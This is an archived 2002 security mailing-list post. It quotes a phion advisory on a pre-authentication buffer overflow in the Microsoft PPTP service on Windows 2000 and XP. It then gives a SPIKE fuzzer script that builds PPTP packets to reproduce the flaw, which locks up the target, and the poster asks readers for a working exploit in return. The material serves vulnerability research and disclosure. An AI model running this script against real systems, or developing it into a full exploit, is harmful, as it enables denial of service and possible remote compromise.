SPIKE 2.6.2 or above should be able to handle this .spk file which will replicate the vulnerability. Someone send me a working sploit in exchange, please. I'm too lazy to muck with it. (Or I have other exploits to muck with, one or the other :>)
-dave P.S. Grab new SPIKE releases (2.6.2 for SPIKE and 1.3 for SPIKE Proxy) at http://www.immunitysec.com/spike.html, if you haven't already. P.P.S. This script is released under the terms of the GNU GPL v 2.0. On Thu, 2002-09-26 at 05:43, [EMAIL PROTECTED] wrote: > phion Security Advisory 26/09/2002 > > Microsoft PPTP Server and Client remote vulnerability > > > Summary > ----------------------------- > > The Microsoft PPTP Service shipping with Windows 2000 and XP contains a > remotely exploitable pre-authentication bufferoverflow. > > > Affected Systems > ----------------------------- > > Microsoft Windows 2000 and XP running either a PPTP Server or Client. > > > Impact > ----------------------------- > > With a specially crafted PPTP packet it is possible to overwrite kernel > memory. > > A DoS resulting in a lockup of the machine has been verified on > Windows 2000 SP3 and Windows XP. > > A remote compromise should be possible deploying proper shellcode, > as we were able to fill EDI and EDX with our data. > > Clients are vulnerable too, because the Service always listens on port > 1723 on any interface of the machine, this might be of special concern > to DSL users which use PPTP to connect to their modem. > > > Solution > ----------------------------- > > As a temporary solution for the Client issue, one might firewall the PPTP > port in the Internet Connection Firewall for Windows XP. > > We dont know of any solution for Windows 2000 and Windows XP PPTP servers. > > The vendor has been informed. > > > Acknowledgements > ----------------------------- > > The bug has been discovered by Stephan Hoffmann and Thomas Unterleitner > on behalf of phion Information Technologies. > > > Contact Information > ----------------------------- > > phion Information Technologies can be reached via: > [EMAIL PROTECTED] / http://www.phion.com > > Stephan Hoffmann can be reached via: > [EMAIL PROTECTED] > > Thomas Unterleitner can be reached via: > [EMAIL PROTECTED] > > References > ----------------------------- > > [1] phion Information Technologies > http://www.phion.com/ > > Exploit > ----------------------------- > > phion Information Technologies will not provide an exploit for this issue. > > > Disclaimer > ----------------------------- > > This advisory does not claim to be complete or to be usable for any > purpose. > > This advisory is free for open distribution in unmodified form. > > Articles or Publications that are based on information from this advisory > have to include link [1]. > >
//start control request
s_block_start("PPTP");
s_binary_block_size_halfword_bigendian("PPTP");
//message type 1 - control request
s_int_variable(0x0001,5);
//cookie
s_binary("1a 2b 3c 4d");
//type 1 - start control request
//5 is big endian halfword
s_int_variable(0x0001,5);
//reserved
s_binary("0000");
//version 1.0
s_int_variable(0x0100,5);
//reserved
s_binary("0000");
//Framing: Ethernet
s_binary("00000003");
//Bearer: Digital
s_binary("00000002");
//maximum channels
s_binary("ffff");
//firmware revision
s_int_variable(0x0001,5);
//hostname
s_string_variable("A");
s_binary_repeat("00",63);
//vendor
s_string_variable("A");
s_binary_repeat("00",63);
s_block_end("PPTP");
///
/// NEXT PACKET
///
///
//start outgoing call request
s_block_start("PPTP2");
s_binary_block_size_halfword_bigendian("PPTP2");
//message type 1 - control request
s_int_variable(0x0001,5);
//cookie
s_binary("1a 2b 3c 4d");
//type 1 - outgoing call request
//5 is big endian halfword
s_int_variable(0x0007,5);
//reserved
s_binary("0000");
//call id
s_binary("0000");
//serial number
s_binary("0000");
//min bps
s_binary("00000960");
//max bps
s_binary("00989680");
//bearer capabilities
s_binary("00000002");
//framing
s_binary("00000003");
//recieve window size
s_binary("0003");
//processing delay
s_binary("0000");
s_binary_block_size_halfword_bigendian("PHONENUMBER");
//reserved
s_binary("0000");
s_block_start("PHONENUMBER");
s_string_variable("");
s_block_end("PHONENUMBER");
//subaddress
s_string_variable("");
s_block_end("PPTP2");
signature.asc
Description: This is a digitally signed message part
